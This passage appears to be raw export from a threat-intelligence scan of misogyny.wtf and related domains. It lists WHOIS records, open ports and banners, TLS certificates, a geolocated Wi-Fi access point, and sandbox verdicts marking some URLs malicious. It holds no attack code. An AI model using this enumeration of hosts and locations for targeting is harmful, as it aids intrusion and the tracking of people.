identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Phone Ext: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Fax Ext: REDACTED FOR PRIVACY Billing Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Name Server: ns709.websitewelcome.com Name Server: ns710.websitewelcome.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp % % Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal % Notice, available at http://www.cira.ca/legal-notice/?lang=en % % (c) 2022 Canadian Internet Registration Authority, (http://www.cira.ca/) 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77a8befc7cae86aa-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, 
no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.0 2022-12-18 00:21:20 Netblock Membership No Censys 0 0 2 0 None 188.114.97.0/24 188.114.97.1 2022-12-18 00:18:04 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.0:443 188.114.97.0/24 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:2083 172.67.190.129 2022-12-18 00:41:01 Similar Domain Yes TLD Searcher 1 0 1 0 None misogyny.com misogyny.wtf 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None attentivewellmadeaudit.replealtan.repl.co 34.149.204.188 2022-12-18 00:21:30 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b14ee8bd622cb3-ORD Content-Encoding: gzip 172.67.190.129 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77aaa4331c29fd8a-ORD 188.114.97.1 2022-12-18 00:04:01 Country No Country Name Extractor 0 0 4 0 None United States webapps.net 2022-12-18 00:08:41 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 20 20:09:20 2022 GMT Not After : Dec 19 20:09:19 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:9e:35:88:49:0b:b7:05:fb:30:39:91:2c:a4:c8: 3d:37:20:a3:92:d0:d2:11:82:4f:c7:bd:e3:16:9d: be:3d:3f:14:1f:c4:fd:44:00:d3:22:0e:0a:15:80: 32:c2:39:da:b8:ae:34:4f:14:01:a5:16:f7:6e:eb: 
30:0a:c1:cc:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:2c:85:5d:bb:57:90:dc:e7:0e:c1:fb:19:64:4d: ed:ef:1a:0f:25:57:66:e4:78:e3:5f:76:69:98:83:4f:9e:d6: 0e:92:0e:dc:62:fc:84:10:12:13:a6:68:99:e0:70:95:02:30: 43:a3:8d:79:ff:59:63:32:3d:8c:92:53:12:59:3a:b1:60:01: 58:91:c2:32:0d:d7:e9:cb:b7:70:ff:a3:a2:56:80:bd:93:6a: 54:5c:52:12:8b:bd:3b:4e:9b:aa:4c:e2 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None vapor (Net ID: 00:02:2D:09:FB:FD) 37.780462,-122.390564 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None fala00001.falab000bella.repl.co 34.149.204.188 2022-12-18 00:06:31 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.147.230:8443 172.67.147.230 2022-12-18 00:18:31 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.13:80 188.114.97.0/24 2022-12-18 00:03:27 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:54:d1:cf:73:f4:06:da:67:36:31:1b:04:19:11:b7:02:21 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:41:57 2022 GMT Not After : Jun 6 17:41:56 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 
bit) pub: 04:99:c4:36:4d:b6:7c:39:c2:f1:77:60:a8:ba:f8: 1c:59:3e:dd:96:42:44:67:b8:8b:49:69:58:1a:9d: ae:aa:d4:88:d9:2c:d6:c2:df:95:1d:df:ac:20:80: f6:6c:90:00:e7:ce:f6:99:5d:a6:86:c6:4c:71:e4: 0a:11:87:6e:9d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 7C:C0:30:0A:42:D8:F4:C5:D8:B9:9F:B1:0D:6A:DF:8F:DE:76:96:BE X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:73:c9:51:81:24:54:60:50:42:94:ed:53:88:10: 89:96:e7:79:87:b5:b8:53:60:60:89:dc:82:36:ca:08:8a:16: 39:38:0a:9b:7a:23:19:6f:4f:5a:30:1f:e5:6c:76:40:02:30: 3d:be:52:da:80:dc:a2:9d:50:94:22:a3:e3:f8:29:ec:b0:25: 63:d5:de:74:71:c9:c1:71:0e:8c:0d:1d:3a:6e:b9:c4:0a:9e: 23:22:2b:9c:de:86:d5:f4:68:f3:3f:5b 2022-12-18 00:20:59 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 400 Bad Request Server: cloudflare Date: Content-Type: text/html Content-Length: 253 Connection: close CF-RAY: - 2606:4700:3033::6815:1cf0 2022-12-18 00:21:02 Netblock Membership No Censys 0 0 2 0 None 104.21.16.0/20 104.21.28.240 2022-12-18 00:04:01 Physical Location No ipstack 0 0 2 0 None United States 172.67.147.230 2022-12-18 00:25:40 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-186.w90-116.abo.wanadoo.fr 90.116.149.186 2022-12-18 00:31:11 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.faith Registry Domain ID: D40E9E8E1E2AB4C19B383C4976CE87C41-NSR Registrar 
WHOIS Server: https://porkbun.com/whois Registrar URL: www.porkbun.com Updated Date: 2022-11-20T04:29:54Z Creation Date: 2019-10-06T04:29:54Z Registry Expiry Date: 2023-10-06T04:29:54Z Registrar: Porkbun Registrar IANA ID: 1861 Registrar Abuse Contact Email: abuse@porkbun.com Registrar Abuse Contact Phone: +1.5038508351 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Private by Design, LLC Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: NC Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: curitiba.ns.porkbun.com Name Server: salvador.ns.porkbun.com Name Server: fortaleza.ns.porkbun.com Name Server: maceio.ns.porkbun.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:11Z <<< For more information on Whois status codes, please visit https://icann.org/epp The Service is provided so that you may look up certain information in relation to domain names that we store in our database. Use of the Service is subject to our policies, in particular you should familiarise yourself with our Acceptable Use Policy and our Privacy Policy. The information provided by this Service is 'as is' and we make no guarantee of it its accuracy. You agree that by your use of the Service you will not use the information provided by us in a way which is: * inconsistent with any applicable laws, * inconsistent with any policy issued by us, * to generate, distribute, or facilitate unsolicited mass email, promotions, advertisings or other solicitations, or * to enable high volume, automated, electronic processes that apply to the Service. 
You acknowledge that: * a response from the Service that a domain name is 'available', does not guarantee that is able to be registered, * we may restrict, suspend or terminate your access to the Service at any time, and * the copying, compilation, repackaging, dissemination or other use of the information provided by the Service is not permitted, without our express written consent. This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion. plague.faith 2022-12-18 00:04:04 Raw Data from RIRs No Hybrid Analysis 0 0 1 0 None {u'count': 5, u'search_terms': [{u'id': u'domain', u'value': u'misogyny.wtf'}], u'result': [{u'environment_id': 110, u'job_id': u'638f6278389c860b621ea62a', u'analysis_start_time': u'2022-12-06 15:40:40', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 33, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'3f181648f1364a23b7f272f4e60c08615f1febfa72b78e3c8d75daeaaa6d3110', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 110, u'job_id': u'638f600a6664a264d86af3b3', u'analysis_start_time': u'2022-12-06 15:30:19', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 33, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'c1c6183777a5ff13aeb0f503c548f30309a8058c37c93d6c8541614030f00fa5', u'type': None, u'type_short': u'url', u'size': 55}, {u'environment_id': 110, u'job_id': u'638f5e1253d2ec57ca1854bd', u'analysis_start_time': u'2022-12-06 15:21:55', u'vx_family': u'Malicious site', u'av_detect': u'10', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 34, u'verdict': u'malicious', u'submit_name': u'sample.url', 
u'sha256': u'bdd3745faefe1c8fdb922e3671a3e342360d521a0f1fa974510813c51fb1913c', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 110, u'job_id': u'638f5c1808fc134fee52854a', u'analysis_start_time': u'2022-12-06 15:13:29', u'vx_family': u'Malicious site', u'av_detect': u'8', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 63, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'52243024bb50bb158cfb524a2623013b1733c9c67fee71e88d86ac5aeae8f36b', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 110, u'job_id': u'638f5a030d35cf1e924e752e', u'analysis_start_time': u'2022-12-06 15:04:36', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 12, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'33c924af831ebf0a78a69b3c46d21ee130387cbefb922390d78c5dcf642b6f61', u'type': None, u'type_short': u'url', u'size': 65}]} misogyny.wtf 2022-12-18 00:09:12 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.1:80 188.114.96.0/24 2022-12-18 00:22:08 Malicious Internet Name Yes Cleanbrowsing.org 0 1 2 0 None Blocked by Cleanbrowsing.org [mail.zerotwo-best-waifu.online] mail.zerotwo-best-waifu.online 2022-12-18 00:11:11 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.io Registry Domain ID: ea274f7d6870401abc6e330d5b2844e1-DONUTS Registrar WHOIS Server: whois.ovh.com Registrar URL: http://www.ovh.com Updated Date: 2022-12-07T05:21:22Z Creation Date: 2019-12-22T14:30:11Z Registry Expiry Date: 2023-12-22T14:30:11Z Registrar: OVH SAS Registrar IANA ID: 433 Registrar Abuse Contact Email: abuse@ovh.net Registrar Abuse Contact Phone: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY 
Registrant Organization: Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: MT Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Name Server: dns111.ovh.net Name Server: ns111.ovh.net DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:11Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. 
Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. plague.io 2022-12-18 00:14:32 Country No Country Name Extractor 0 1 3 0 None Canada Toronto, Ontario, ON, Canada, CA 2022-12-18 00:25:52 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [188.114.97.1] 188.114.97.1 2022-12-18 00:04:34 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 97, u'compromised_hosts': [u'104.21.28.240', u'104.16.86.20', u'5.45.205.244'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://romsmania.cc/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "iexplore.exe" (UID: 00000000-00003864) was launched with new environment variables: "PATH="%PROGRAMFILES%\\Internet Explorer;""\n Process "iexplore.exe" (UID: 00000000-00003864) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"\n Process "iexplore.exe" (UID: 00000000-00003864) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.207.6:80"\n "172.67.207.6:443"\n "104.21.28.240:443"\n "104.16.86.20:443"\n "77.88.21.119:443"\n "5.45.205.244:80"\n "154.47.36.158:443"\n "23.38.131.139:443"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")\n "IEXPLORE.EXE" (Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")\n "IEXPLORE.EXE" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n 
"IEXPLORE.EXE" (Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "IEXPLORE.EXE" (Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"romsmania.cc"\n "yandex.ocsp-responder.com"\n "cdn.jsdelivr.net"\n "consolegames.down10.software"\n "mc.webvisor.org"\n "mc.yandex.ru"\n "subca.ocsp-certum.com"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-20', u'name': u'Reads Windows Trust Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 5, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING"; Key: "STATE")\n "IEXPLORE.EXE" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING"; Key: "STATE")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "http://romsmania.cc/" (UID: 00000000-00003864)\n Spawned process "IEXPLORE.EXE" with commandline "SCODEF:3864 CREDAT:275457 /prefetch:2" (UID: 00000000-00002776)'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1112', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-203', u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\039EEDB80BE7A03C6953893B20D2D9323A4C2AFD"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\97817950D81C9670CC34D809CF794431367EF474"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\AD7E1C28B064EF8F6003402014C3D0E3370EB58A"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\91C6D6EE3E8AC86384E548C299295C756C817B81"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE"; Key: "DISALLOWEDCERTENCODEDCTL")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE"; Key: "DISALLOWEDCERTLASTSYNCTIME")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\F18B538D1BE903B6A6F056435B171589CAF36BF2"; Key: "BLOB")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3864"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f18_IE_EarlyTabStart_0x4e4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f18_ConnHashTable<3864>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f18_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f18_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f18_IESQMMUTEX_0_331"\n "IsoScope_f18_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "http://romsmania.cc/" (UID: 00000000-00003864)\n Spawned process "IEXPLORE.EXE" with commandline 